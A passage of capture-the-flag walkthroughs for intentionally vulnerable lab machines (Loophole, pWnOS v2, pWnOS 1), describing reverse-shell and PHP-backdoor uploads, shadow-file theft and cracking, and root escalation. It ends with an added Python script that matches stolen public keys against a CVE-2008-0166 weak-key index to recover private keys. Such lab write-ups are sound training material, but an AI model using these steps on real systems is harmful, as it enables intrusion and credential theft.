<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg06UD5qRGD6-xFRLQU9W_G5cOW7894hj_0z0kjLRPGuePPWXy4Zo97prCmakG4RBMByb0vE8zDWGwX1l-0ii1tpxwoZ2f40zjSM7DoI3rNCLDTdB_TX04baa9GyYvox2jpF8hMt1_ehDE/s1600/tel.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg06UD5qRGD6-xFRLQU9W_G5cOW7894hj_0z0kjLRPGuePPWXy4Zo97prCmakG4RBMByb0vE8zDWGwX1l-0ii1tpxwoZ2f40zjSM7DoI3rNCLDTdB_TX04baa9GyYvox2jpF8hMt1_ehDE/s1600/tel.png" /></a></div>
<br />
Hmmm, strange... But the numbers indicate Houston, Texas (USA). Maybe it is a password for milton, peter, bill or blumbergh? Let's try. It works for milton! I ran <b>netstat -antp</b> again and there is an interesting port, 8888, so again - let's perform remote port forwarding!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLWnY6fVqiRwGemS2rqTY0Jwpt6EdmUpH-lwdX4_TshjPU4tqmYNr3tD5BL42UTQc_ZaXByfc09zEBa7jsM78OV-rG5NPdFKV1b5rI9RXL-C4Svhcp5eKT-qxtIGxM9buZWbKujr5ySPA/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="617" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLWnY6fVqiRwGemS2rqTY0Jwpt6EdmUpH-lwdX4_TshjPU4tqmYNr3tD5BL42UTQc_ZaXByfc09zEBa7jsM78OV-rG5NPdFKV1b5rI9RXL-C4Svhcp5eKT-qxtIGxM9buZWbKujr5ySPA/s640/shell.png" width="640" /></a></div>
<br />
Good! Let's browse it. BINGO!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhavrM8iDwJ0JgflF_YRObMYm_VquhlCBp0NFPiejqirFxBEYf5msbM8KX5FBBhSiTfj-jFC7tRXFzU36XE3XMOI_-PliA_JGw76_VSP2a9UdfY_zTjErs-UHC45HgNOlroKMXicDhLjvQ/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhavrM8iDwJ0JgflF_YRObMYm_VquhlCBp0NFPiejqirFxBEYf5msbM8KX5FBBhSiTfj-jFC7tRXFzU36XE3XMOI_-PliA_JGw76_VSP2a9UdfY_zTjErs-UHC45HgNOlroKMXicDhLjvQ/s640/web.png" width="640" /></a></div>
<br />
OK, let's click on the oscommerce link:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUzdOg4OFxzfxJ0Uw-bOOBmdUh5LGSQv8QLSv6FN6LXyP_YK0alUK-7aplW-vBowyYUEsI74hIcYaCs6ehTNYGXPGd6RhG1co_Zw8Qd39CgTVQ9-eCHtEJRCrdVJTiTkhczeTJUXPdK1k/s1600/os.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUzdOg4OFxzfxJ0Uw-bOOBmdUh5LGSQv8QLSv6FN6LXyP_YK0alUK-7aplW-vBowyYUEsI74hIcYaCs6ehTNYGXPGd6RhG1co_Zw8Qd39CgTVQ9-eCHtEJRCrdVJTiTkhczeTJUXPdK1k/s640/os.png" width="640" /></a></div>
<br />
Very good, dirb found the admin panel, but the credentials we stole using SQL injection don't work there. But admin:admin works!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nR-bZzKV2NEiaUVESKoJyPnq7BmKJacmI-hUObktZxZP8Z8e9r0i1l58NmyCvn8af43TglJ0mEldfAI8OwGJbSyBrxB85VfeBhNjQ7scTUkBV7nV0LROCoJ42j7L5j_BMqK2dsvfxlI/s1600/admin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nR-bZzKV2NEiaUVESKoJyPnq7BmKJacmI-hUObktZxZP8Z8e9r0i1l58NmyCvn8af43TglJ0mEldfAI8OwGJbSyBrxB85VfeBhNjQ7scTUkBV7nV0LROCoJ42j7L5j_BMqK2dsvfxlI/s640/admin.png" width="640" /></a></div>
<br />
Nice! I have found the File Manager:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNM_cMg1-YvICM_Q-c1xO1_aPyZntRfhCYXapDMq2rFVPTay_rEGJynusYnUs8WsQwoF8piKhTogQS8G_7Oi-BF_Tl9QU1INuM3NoVFn0oqZzQ0hU_6Pvyb5DP5geIPZp66qSGTzKzjW8/s1600/file_manager.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNM_cMg1-YvICM_Q-c1xO1_aPyZntRfhCYXapDMq2rFVPTay_rEGJynusYnUs8WsQwoF8piKhTogQS8G_7Oi-BF_Tl9QU1INuM3NoVFn0oqZzQ0hU_6Pvyb5DP5geIPZp66qSGTzKzjW8/s640/file_manager.png" width="640" /></a></div>
<br />
So, let's try to upload a reverse shell. To do this we have to find a writable directory. BINGO! The work directory is writable - I have uploaded a reverse shell script and<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhOS97PgdyszTxqYH4fyLX3oSmMyVxsX-IDO-ZaJeZoYHsYdbL8AtesaEfluTbn114ls8fyq68e8Z8O6rD0tB6UGlmnLCRoMNVdN386YyywgAR6Ou_2rPVmcBCjy2nTgelevRLz44YXM/s1600/rev.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhOS97PgdyszTxqYH4fyLX3oSmMyVxsX-IDO-ZaJeZoYHsYdbL8AtesaEfluTbn114ls8fyq68e8Z8O6rD0tB6UGlmnLCRoMNVdN386YyywgAR6Ou_2rPVmcBCjy2nTgelevRLz44YXM/s640/rev.png" width="640" /></a></div>
<br />
Excellent! Now we have to use tcpdump to get a root shell. I found a great article about it.<br />
I followed it step by step and obtained a reverse ROOT shell.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwpkVjMZoptjdLH9xa1cxMrtoKtYHxL4q2nOfn-oGV8kpevWgA5xcgZE3KOgyPdYZhwhL04mFyy4CLQ6vB5wcmkBPKCgXE63yeiDCfFFnQiRGnrW_sFh86mF_gY1dgqyb7YYMt9JD7BAU/s1600/root.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwpkVjMZoptjdLH9xa1cxMrtoKtYHxL4q2nOfn-oGV8kpevWgA5xcgZE3KOgyPdYZhwhL04mFyy4CLQ6vB5wcmkBPKCgXE63yeiDCfFFnQiRGnrW_sFh86mF_gY1dgqyb7YYMt9JD7BAU/s1600/root.png" /></a></div>
<br />
Unfortunately the /root/flag.txt file does not exist, so let's locate the flag file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuwKqVQvm8BAiF_tiPHJ1dGnrsoxCM0xKhoGo3m6Tq82LYzDLN4eBMbLEL3HgLNDDfkadGwIRtjtAtcQgxRgMQCDJi-4Bh6bVmWeepY6HtGIAS-BjC_cF7gSqchbMJ5KhvQHVc6VlUKRc/s1600/gma.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="538" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuwKqVQvm8BAiF_tiPHJ1dGnrsoxCM0xKhoGo3m6Tq82LYzDLN4eBMbLEL3HgLNDDfkadGwIRtjtAtcQgxRgMQCDJi-4Bh6bVmWeepY6HtGIAS-BjC_cF7gSqchbMJ5KhvQHVc6VlUKRc/s640/gma.png" width="640" /></a></div>
<br />
Game over!<br />
<br />
This challenge was extremely amazing!<br />
<br />
<br />
<b>Loophole challenge</b> (published 2016-08-11T10:45:00+02:00, updated 2016-08-11T10:47:05+02:00)<br />
<br />
Hi,<br />
<br />
"We suspect that someone inside Rattus labs is working with known terrorist group. Your mission is to infiltrate into their computer network and obtain encrypted document from one of their servers. Our inside source has told us that the document is saved under the name of Private.doc.enc and is encrypted using OpenSSL encryption utility. Obtain the document and decrypt it to complete the mission."<br />
<br />
Scanning<br />
<br />
<br />
We can play with the Samba server, the web application and SSH.<br />
<br />
Web application<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq_no7haZld2zcxMqMGDy5booygmFHEoNCkgDISEzXuFs2mkmZ1LpM2qgD27m9QdSIOFhCea56OdpEvF4OUVVG5EnQqV5-bz_aEUF8_5BHldZklWOGTYPUg1Pzz879oXT5hLnq5kfQxiU/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="309" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq_no7haZld2zcxMqMGDy5booygmFHEoNCkgDISEzXuFs2mkmZ1LpM2qgD27m9QdSIOFhCea56OdpEvF4OUVVG5EnQqV5-bz_aEUF8_5BHldZklWOGTYPUg1Pzz879oXT5hLnq5kfQxiU/s640/web.png" width="640" /></a></div>
<br />
Hmmm, nothing special. If you click on the <b>here</b> link, you get a page which contains several email addresses.<br />
So, I decided to run Dirb:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii_1-cBgTOw2yBftEK8W0UzHYpows_NhfzeG-xNU6bQWdyGKnwFmViX79Ca-R2Ui0PxP4LxuN8l0664dReS4ewgPi8YOuH4GB-mWz2LLJkFKlrg3q3sUD-AxhyphenhyphenVP6MXrvXYf6X0ExqC2I/s1600/dirb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii_1-cBgTOw2yBftEK8W0UzHYpows_NhfzeG-xNU6bQWdyGKnwFmViX79Ca-R2Ui0PxP4LxuN8l0664dReS4ewgPi8YOuH4GB-mWz2LLJkFKlrg3q3sUD-AxhyphenhyphenVP6MXrvXYf6X0ExqC2I/s1600/dirb.png" /></a></div>
<br />
Good, the <b>~root</b>, <b>garbage</b> and <b>info.php</b> entries look very interesting to me.<br />
Unfortunately we don't have enough privileges to view the ~root directory, but the garbage file is very attractive for us!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7mjkfv7WknshKRBm1sMINnYBQDKRiIPx_4RWTonrcp0lTZ-jW0oQPki84MaYori_l6nQs2mIqSDX7QIi9aRgmDkSNhvENxiHb_xX7meTF4Xw0Kot2fFVqiKti1HFTlEmUQIl0yCBns8Y/s1600/garbage.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7mjkfv7WknshKRBm1sMINnYBQDKRiIPx_4RWTonrcp0lTZ-jW0oQPki84MaYori_l6nQs2mIqSDX7QIi9aRgmDkSNhvENxiHb_xX7meTF4Xw0Kot2fFVqiKti1HFTlEmUQIl0yCBns8Y/s1600/garbage.png" /></a></div>
<br />
Something like a shadow file, isn't it?<br />
Let's try to crack it!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ9j_hkQIxZRh0-JL4h1VjsqBhXHUDKGYjUVJshRxkTM7A8vPE8jY0fLc0EB8Erslk7BMcQxzT7Fu6sB3mVSLFMYBkCFafJTGlf9mQ_inyDIexcYS7aR6lGbcC_Jr1WoR5RUJupklSBtM/s1600/john.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ9j_hkQIxZRh0-JL4h1VjsqBhXHUDKGYjUVJshRxkTM7A8vPE8jY0fLc0EB8Erslk7BMcQxzT7Fu6sB3mVSLFMYBkCFafJTGlf9mQ_inyDIexcYS7aR6lGbcC_Jr1WoR5RUJupklSBtM/s640/john.png" width="640" /></a></div>
<br />
Great! So, let's try to log in via SSH.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_7l2fihjwHQU6HkUEoNhehd05YPefAxEoAnuiEt6i3zYkwDyaeVLNTgbNyUqItGN6tj3iwEIGZBOZzomSAw8bEk8YABWIu0pvWa7v6XmHyxZCvojfGLeas9Fc7GU07SzjRXsao110vk/s1600/ssh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_7l2fihjwHQU6HkUEoNhehd05YPefAxEoAnuiEt6i3zYkwDyaeVLNTgbNyUqItGN6tj3iwEIGZBOZzomSAw8bEk8YABWIu0pvWa7v6XmHyxZCvojfGLeas9Fc7GU07SzjRXsao110vk/s640/ssh.png" width="640" /></a></div>
<br />
Excellent! So, we have to find the Private.doc.enc file and decrypt it!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdhnA8tMkOSn19x-0w3NGqCB4XbOqby9qoJgS6I7IFlVWf7yhUnrX_g3In6QZ8le17PWep5hIcQ3luKDqPTLizVHrxwoMwD85Zw2-hgFFJ_ZaVzwlOmmgYumsq01COWjmVCpAaEjpSME0/s1600/doc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdhnA8tMkOSn19x-0w3NGqCB4XbOqby9qoJgS6I7IFlVWf7yhUnrX_g3In6QZ8le17PWep5hIcQ3luKDqPTLizVHrxwoMwD85Zw2-hgFFJ_ZaVzwlOmmgYumsq01COWjmVCpAaEjpSME0/s1600/doc.png" /></a></div>
<br />
OK, so let's decrypt it! Maybe .bash_history holds juicy information for us, since the tskies user encrypted the Private.doc file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixh-C5bt4sYXEjLBmbicIXawKEBQ4pt7V5ylZTQBULbBzGpTD_F2p4jydYbDYFNm2BFvGrFxM50gmgGAO8Q2MuNH1Bsx0ZzT08nxvY10vfvllKKcksyRebKSIXphZ8qXUej4WTYz8LX0g/s1600/bash.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixh-C5bt4sYXEjLBmbicIXawKEBQ4pt7V5ylZTQBULbBzGpTD_F2p4jydYbDYFNm2BFvGrFxM50gmgGAO8Q2MuNH1Bsx0ZzT08nxvY10vfvllKKcksyRebKSIXphZ8qXUej4WTYz8LX0g/s640/bash.png" width="640" /></a></div>
<br />
Good, we know the command which encrypted the Private.doc file.<br />
I decrypted the file and it turned out to be the engineers' confidential doc :-)<br />
<br />
Game over<br />
<br />
<br />
<b>pWnOS v2</b> (published 2016-08-10T13:48:00+02:00, updated 2016-08-10T13:48:04+02:00)<br />
<br />
Hello,<br />
The second (and latest) version of the pWnOS challenges.<br />
<br />
Scanning<br />
<blockquote class="tr_bq">
PORT STATE SERVICE VERSION<br /><b>22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)</b><br />| ssh-hostkey: <br />| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)<br />| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)<br />|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)<br /><b>80/tcp open http Apache httpd 2.2.17 ((Ubuntu))</b><br />|_http-server-header: Apache/2.2.17 (Ubuntu)<br />|_http-title: Welcome to this Site!</blockquote>
OK, as always, let's start from the web application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfbYnXRGL2OchaR3OC-YwdhVYUPhWvCHpzrpT3N8wMwNFCekrO701J_tUJUMBETCWJllPEIYz-b3F-KM3T15rHNJU3YTQfvMoBIxIY_AM5j0sZ-dLuf6femWu1MHe3xRijmWPa3UESNQg/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfbYnXRGL2OchaR3OC-YwdhVYUPhWvCHpzrpT3N8wMwNFCekrO701J_tUJUMBETCWJllPEIYz-b3F-KM3T15rHNJU3YTQfvMoBIxIY_AM5j0sZ-dLuf6femWu1MHe3xRijmWPa3UESNQg/s1600/web.png" /></a></div>
<br />
OK, let's try registering an account in the web application. DirBuster also found a blog directory.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzWi8E_WYd0t82F2KyLnWCwXpWeIb-nPH5jhD8z09gQhDfy55U9rl_zsGYzGtSYFm-YdI1XlQekfZm_V6u1WffLfyzLW4d83YkfT1qmowBVKQ7PPpJ6mh0dFTo8HKQRZS1SOf3MP0auuo/s1600/blog.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="555" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzWi8E_WYd0t82F2KyLnWCwXpWeIb-nPH5jhD8z09gQhDfy55U9rl_zsGYzGtSYFm-YdI1XlQekfZm_V6u1WffLfyzLW4d83YkfT1qmowBVKQ7PPpJ6mh0dFTo8HKQRZS1SOf3MP0auuo/s640/blog.png" width="640" /></a></div>
<br />
Good, in the page source I discovered that this is Simple PHP Blog 0.4.0, for which a working public exploit is available.<br />
I used the exploit to replace the blog credentials with ones I know, logged in, uploaded a PHP backdoor and executed it from the images directory.<br />
Once I had a limited shell, I found the PHP MySQL connection file, which contains valid credentials for the database root user. The same password also worked for the system root account (plain password reuse), and that gave me root on the system.<br />
<br />
Game over!rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-48126623213596516812016-08-09T21:31:00.000+02:002016-08-10T08:52:05.902+02:00pWnOS 1Hi,<br />
"It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. :) Currently, the virtual machine NIC is configured in bridged networking, so it will obtain a normal IP address on the network you are connected to. You can easily change this to NAT or Host Only if you desire. A quick ping sweep will show the IP address of the virtual machine."<br />
<br />
Scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8fNcWn4WyxCDjeMKzZDmf_nMxgzUptc5JK1LEX0UMx0eml8tDTrZ54LtHUHxmMolgivRO8O2PbcxPtseF05X7hcYguAwdHWlBWwK2mgkTtLEMxiWwSMySKzkYO87y7JKrzF7WoT7vx8U/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8fNcWn4WyxCDjeMKzZDmf_nMxgzUptc5JK1LEX0UMx0eml8tDTrZ54LtHUHxmMolgivRO8O2PbcxPtseF05X7hcYguAwdHWlBWwK2mgkTtLEMxiWwSMySKzkYO87y7JKrzF7WoT7vx8U/s1600/nmap.png" /></a></div>
<br />
Good, let's start with port <b>80 (HTTP)</b> and then port <b>10000 (HTTP)</b>.<br />
The default web page looks as below.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzpxg237arsOgDLomOQU2ACFJPcEQF3Ig8nL1qNbQtZmLjv8IReTjGyDgB1IEU2V4ze-vPb2TVWis3TTXkrGy3wP4jAwGoEBaBPCwVMZQf03_BEBO7iirCShh_nfISeqssb1xjwFewB5M/s1600/def.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzpxg237arsOgDLomOQU2ACFJPcEQF3Ig8nL1qNbQtZmLjv8IReTjGyDgB1IEU2V4ze-vPb2TVWis3TTXkrGy3wP4jAwGoEBaBPCwVMZQf03_BEBO7iirCShh_nfISeqssb1xjwFewB5M/s1600/def.png" /></a></div>
<br />
OK, so let's click the Next button.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPLyFbVnRbgGcw1rirUZhPSOEDd-4hTNkr7fgexgMrdZLYcgfFw6y8jUsR4YPFBgyzxziI0BcL9iE2wWkrT0l8zCrzc9pRBx5drqTWeX9CbFwE1tqUXYNLshLNVJjB6D_zIkijxsLmBd0/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPLyFbVnRbgGcw1rirUZhPSOEDd-4hTNkr7fgexgMrdZLYcgfFw6y8jUsR4YPFBgyzxziI0BcL9iE2wWkrT0l8zCrzc9pRBx5drqTWeX9CbFwE1tqUXYNLshLNVJjB6D_zIkijxsLmBd0/s1600/web.png" /></a></div>
<br />
Hmmm, I don't know what it is, but it looks like some kind of help page. Let's run DirBuster.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitV9rojkQ1olAsFq66G84O2TyUYCt3Sqeii2JsFuv1FHSEMzFXlf8Dahqr-s28RVtzEhHLtwPxwh0rL-I8FsDGQA8n3-d-71EVAjFgjwUfuvTukPksaZabynCojUIqV5P1dQ9V26iC2dg/s1600/dirbu.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitV9rojkQ1olAsFq66G84O2TyUYCt3Sqeii2JsFuv1FHSEMzFXlf8Dahqr-s28RVtzEhHLtwPxwh0rL-I8FsDGQA8n3-d-71EVAjFgjwUfuvTukPksaZabynCojUIqV5P1dQ9V26iC2dg/s1600/dirbu.png" /></a></div>
<br />
I tried to log in to the phpMyAdmin panel with default credentials, without success.<br />
Let's try port <b>10000 (HTTP)</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-GKmoKDOwRpqlkSL7XlXn9TKNmkeuA5tokruAfRcoSgjExH9czY8-RTgl31Q8AecS6B2uq5RZ8v2MXhRNUnWiXGEiOvSU41iSjWWU3HJWwKUOsMQjeEu856PhaPndehYTox6Bb9GtKVQ/s1600/webmin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-GKmoKDOwRpqlkSL7XlXn9TKNmkeuA5tokruAfRcoSgjExH9czY8-RTgl31Q8AecS6B2uq5RZ8v2MXhRNUnWiXGEiOvSU41iSjWWU3HJWwKUOsMQjeEu856PhaPndehYTox6Bb9GtKVQ/s1600/webmin.png" /></a></div>
<br />
I also tried to log in with default credentials, again without success. Webmin has several well-known exploits, so let's try some of them.<br />
BINGO! The Webmin arbitrary file disclosure exploit works. (The <b>2017</b> in the screenshot is its Exploit-DB ID, not a CVE year; the underlying bug is CVE-2006-3392.)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhim7EaxOSZLjJgGY_7BMeehfhEueUPv_s8dRqVwzf03VnlNEWV4QdCfZMSxtGN7fPwLYUefwzZS3zc-46yICD5RKbCp1-LFNtTPFXhqzI4vmSI4JPgC6x89L3O08MrKpg7I8Mv_qmar3I/s1600/exploit.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhim7EaxOSZLjJgGY_7BMeehfhEueUPv_s8dRqVwzf03VnlNEWV4QdCfZMSxtGN7fPwLYUefwzZS3zc-46yICD5RKbCp1-LFNtTPFXhqzI4vmSI4JPgC6x89L3O08MrKpg7I8Mv_qmar3I/s1600/exploit.png" /></a></div>
<br />
Now we have all lines of the /etc/passwd file. Let's try to display /etc/shadow as well.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTIy99C5-hg_TYJNO24KIricEP5Fb5Ng4JF3yW14LpBvN4cWlGU_ucMZoXq8JNOPuyFBBWv0PqG1hbFZ7_Ppc0_uSoeGrmKyfRYPB5HTyX7dwGsOVYT5mmf-SPhiK-lg961C7Vpjaz5kM/s1600/shadow.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTIy99C5-hg_TYJNO24KIricEP5Fb5Ng4JF3yW14LpBvN4cWlGU_ucMZoXq8JNOPuyFBBWv0PqG1hbFZ7_Ppc0_uSoeGrmKyfRYPB5HTyX7dwGsOVYT5mmf-SPhiK-lg961C7Vpjaz5kM/s1600/shadow.png" /></a></div>
<br />
Awesome! We can run John the Ripper now! Unfortunately it takes a lot of time, too much for me.<br />
I had no other idea, so I did some research on the OpenSSH version and saw (unfortunately, as part of someone else's solution) that the box is vulnerable to CVE-2008-0166, the Debian OpenSSL predictable-RNG bug: keys generated on an affected system come from a small, enumerable set, so a user's SSH key pair can be recovered from a pre-generated list of weak keys.<br />
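What makes CVE-2008-0166 usable in practice is a lookup, not a crack: once you have a user's public key (from authorized_keys or id_rsa.pub, obtained here through the file disclosure), you fingerprint it and look the fingerprint up in an index built over the pre-generated weak-key set, which gives you the matching private key. The following is an added example, my code rather than anything from the original post; the authorized_keys line and the key blob in it are constructed placeholders, and the weak-key index is assumed to map fingerprints to private-key paths inside such a set.<br />

```python
import base64
import hashlib

# Constructed sample authorized_keys content (placeholder blob, NOT a real key):
# in the challenge this would be the file read through the Webmin file disclosure.
_FAKE_BLOB = base64.b64encode(
    b"\x00\x00\x00\x07ssh-rsa" + b" constructed placeholder, not a real key"
).decode()
SAMPLE_AUTHORIZED_KEYS = (
    "# authorized_keys recovered from the target\n"
    f"ssh-rsa {_FAKE_BLOB} vmware@ubuntuvm\n"
)

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ecdsa-sha2-nistp256", "ssh-ed25519")


def md5_fingerprint(blob: bytes) -> str:
    """Legacy OpenSSH format (ssh-keygen -l -E md5): colon-separated hex bytes."""
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def sha256_fingerprint(blob: bytes) -> str:
    """Current OpenSSH format: 'SHA256:' + unpadded base64 of the SHA-256 digest."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str):
    """Return (key_type, decoded_blob, comment) for every key line.

    Blank and comment lines are skipped; an optional leading options field
    (e.g. from="10.0.0.1",no-pty) in front of the key type is tolerated.
    """
    entries = []
    for line in text.splitlines():
        fields = line.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        for i, tok in enumerate(fields):
            if tok in KEY_TYPES and i + 1 < len(fields):
                blob = base64.b64decode(fields[i + 1])
                entries.append((tok, blob, " ".join(fields[i + 2:])))
                break
    return entries


def find_weak_keys(authorized_keys_text: str, weak_index: dict):
    """Match every key in the file against a weak-key index.

    weak_index maps a fingerprint (MD5 or SHA256 form, whichever the index
    was built with) to the path of the matching private key inside a
    pre-generated CVE-2008-0166 key set.  Returns a list of
    (key_type, comment, fingerprint, private_key_path).
    """
    hits = []
    for key_type, blob, comment in parse_authorized_keys(authorized_keys_text):
        for fp in (md5_fingerprint(blob), sha256_fingerprint(blob)):
            if fp in weak_index:
                hits.append((key_type, comment, fp, weak_index[fp]))
                break
    return hits


if __name__ == "__main__":
    # Constructed index: in practice you build it once by fingerprinting every
    # .pub file in the weak-key set and storing fingerprint -> private key path.
    blob = parse_authorized_keys(SAMPLE_AUTHORIZED_KEYS)[0][1]
    index = {md5_fingerprint(blob): "rsa/2048/constructed.key"}
    for key_type, comment, fp, path in find_weak_keys(SAMPLE_AUTHORIZED_KEYS, index):
        print(f"{comment}: {key_type} {fp} -> ssh -i {path} vmware@target")
```

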